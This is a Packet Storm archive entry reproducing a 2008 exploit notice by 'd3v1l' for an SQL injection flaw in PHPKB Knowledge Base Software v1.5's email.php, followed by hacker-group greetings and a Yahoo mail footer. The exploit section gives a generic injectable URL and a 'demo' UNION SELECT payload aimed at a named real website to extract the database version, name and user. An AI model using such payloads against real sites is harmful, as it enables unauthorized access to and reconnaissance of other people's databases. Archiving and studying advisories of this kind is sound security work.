phpkb-1.5-email.php.txt

2008-09-22T00:00:00
ID PACKETSTORM:70166
Type packetstorm
Reporter d3v1l
Modified 2008-09-22T00:00:00

Description

                                        
                                            `[~] PHPKB Knowledge Base Software v1.5 Professional (email.php) - SQL Injection Vulnerability  
[~]   
[~] http://www.knowledgebase-script.com  
[~] ----------------------------------------------------------  
[~] Bug founded by d3v1l  
[~]   
[~] Date: 20.09.2007  
[~]  
[~]  
[~] d3v1l@spoofer.com  
[~]  
[~] -----------------------------------------------------------  
[~] Greetz tO:-  
[~]   
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )  
[~]   
[~] Pentest|Gibon|Pig  
[~]-------------------------------------------------------------  
[~] Exploit :-  
[~]  
[~] http://site.com/email.php?ID=SQL  
[~]   
[~] Demo :-   
[~]   
[~]   
[~] http://www.faqkb.com/email.php?ID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*  
[~]   
[~]----------------------------------------------------------------------------------------------------------------------  
  
__________________________________________________  
Do You Yahoo!?  
Poco spazio e tanto spam? Yahoo! Mail ti protegge dallo spam e ti da tanto spazio gratuito per i tuoi file e i messaggi   
http://mail.yahoo.it `